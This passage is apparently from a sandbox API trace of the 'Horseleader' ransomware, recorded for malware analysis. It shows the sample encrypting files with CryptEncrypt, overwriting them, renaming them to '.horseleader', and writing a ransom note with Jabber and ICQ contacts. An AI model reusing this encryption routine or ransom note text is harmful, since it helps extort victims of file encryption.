lpOverlapped=0x0) returned 1 [0245.455] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.455] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.455] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.455] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.455] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.456] CloseHandle (hObject=0x158) returned 1 [0245.456] GetProcessHeap () returned 0x780000 [0245.456] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.456] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_EN.LEX.horseleader") returned 81 [0245.456] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_EN.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mswds_en.lex"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_EN.LEX.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mswds_en.lex.horseleader")) returned 1 [0245.458] GetProcessHeap () returned 0x780000 [0245.459] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.459] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5e2ea00, ftCreationTime.dwHighDateTime=0x1bdf5d3, ftLastAccessTime.dwLowDateTime=0x5b0da70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe5e2ea00, ftLastWriteTime.dwHighDateTime=0x1bdf5d3, nFileSizeHigh=0x0, nFileSizeLow=0x60983, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSWDS_ES.LEX", cAlternateFileName="")) returned 1 [0245.459] lstrcmpiW (lpString1="MSWDS_ES.LEX", lpString2="Windows") returned -1 [0245.459] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_ES.LEX") returned 69 [0245.459] StrStrIW (lpFirst="MSWDS_ES.LEX", lpSrch=".horseleader") returned 0x0 [0245.459] lstrcmpW (lpString1="MSWDS_ES.LEX", lpString2="#Decrypt#.txt") returned 1 [0245.459] lstrcmpW (lpString1="MSWDS_ES.LEX", lpString2="_uninstalling_.png") returned 1 [0245.459] lstrlenW (lpString=".testttjffg") returned 11 [0245.459] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_ES.LEX", lpSrch=".testttjffg") returned 0x0 [0245.459] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.459] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.459] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_ES.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mswds_es.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.460] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_ES.LEX") returned 69 [0245.460] StrStrW (lpFirst="MSWDS_ES.LEX", lpSrch=".txt") returned 0x0 [0245.460] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=395651) returned 1 [0245.460] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.460] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.463] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.463] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.465] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x2dcc1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.465] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.466] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.466] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.466] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x5b983, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.466] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.468] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.469] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.469] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.469] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.469] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.469] CloseHandle (hObject=0x158) returned 1 [0245.469] GetProcessHeap () returned 0x780000 [0245.469] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.469] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_ES.LEX.horseleader") returned 81 [0245.469] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_ES.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mswds_es.lex"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_ES.LEX.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mswds_es.lex.horseleader")) returned 1 [0245.470] GetProcessHeap () returned 0x780000 [0245.470] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.470] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf3c9300, ftCreationTime.dwHighDateTime=0x1bdf5d3, ftLastAccessTime.dwLowDateTime=0x78ced70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcf3c9300, ftLastWriteTime.dwHighDateTime=0x1bdf5d3, nFileSizeHigh=0x0, nFileSizeLow=0x482ef, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSWDS_FR.LEX", cAlternateFileName="")) returned 1 [0245.470] lstrcmpiW (lpString1="MSWDS_FR.LEX", lpString2="Windows") returned -1 [0245.470] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_FR.LEX") returned 69 [0245.471] StrStrIW (lpFirst="MSWDS_FR.LEX", lpSrch=".horseleader") returned 0x0 [0245.471] lstrcmpW (lpString1="MSWDS_FR.LEX", lpString2="#Decrypt#.txt") returned 1 [0245.471] lstrcmpW (lpString1="MSWDS_FR.LEX", lpString2="_uninstalling_.png") returned 1 [0245.471] lstrlenW (lpString=".testttjffg") returned 11 [0245.471] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_FR.LEX", lpSrch=".testttjffg") returned 0x0 [0245.471] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.471] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.471] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_FR.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mswds_fr.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.472] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_FR.LEX") returned 69 [0245.472] StrStrW (lpFirst="MSWDS_FR.LEX", lpSrch=".txt") returned 0x0 [0245.472] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=295663) returned 1 [0245.472] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.472] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.475] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.475] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.475] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x21977, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.476] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.477] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.477] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.478] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x432ef, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.478] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.481] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.481] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.481] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.481] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.481] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.481] CloseHandle (hObject=0x158) returned 1 [0245.481] GetProcessHeap () returned 0x780000 [0245.481] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.481] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_FR.LEX.horseleader") returned 81 [0245.482] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_FR.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mswds_fr.lex"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_FR.LEX.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mswds_fr.lex.horseleader")) returned 1 [0245.482] GetProcessHeap () returned 0x780000 [0245.482] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.482] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf3c9300, ftCreationTime.dwHighDateTime=0x1bdf5d3, ftLastAccessTime.dwLowDateTime=0x78ced70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcf3c9300, ftLastWriteTime.dwHighDateTime=0x1bdf5d3, nFileSizeHigh=0x0, nFileSizeLow=0x482ef, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSWDS_FR.LEX", cAlternateFileName="")) returned 0 [0245.483] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0245.483] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\#Decrypt#.txt") returned 70 [0245.483] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0245.483] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0245.483] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0245.485] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0245.485] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0245.485] CloseHandle (hObject=0x21c) returned 1 [0245.485] GetProcessHeap () returned 0x780000 [0245.485] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0245.485] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed123f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xd5807780, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd5807780, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Smart Tag", cAlternateFileName="SMARTT~1")) returned 1 [0245.485] lstrcmpiW (lpString1="Smart Tag", lpString2="Windows") returned -1 [0245.485] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag") returned 60 [0245.485] lstrcmpW (lpString1="Smart Tag", lpString2=".") returned 1 [0245.485] lstrcmpW (lpString1="Smart Tag", lpString2="..") returned 1 [0245.485] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0245.485] GetProcessHeap () returned 0x780000 [0245.485] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0245.485] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*") returned 62 [0245.485] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed123f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xd5807780, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd5807780, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0245.488] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0245.488] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\.") returned 62 [0245.488] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0245.488] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed123f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xd5807780, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd5807780, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0245.488] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0245.489] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\..") returned 63 [0245.489] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0245.489] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0245.489] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeee1cd90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef058230, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="1033", cAlternateFileName="")) returned 1 [0245.489] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0245.489] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033") returned 65 [0245.489] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0245.489] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0245.489] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0245.489] GetProcessHeap () returned 0x780000 [0245.489] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.489] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\*") returned 67 [0245.489] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeee1cd90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef058230, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3d46b48d, dwReserved1=0x38a709c6, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0245.491] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0245.491] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\.") returned 67 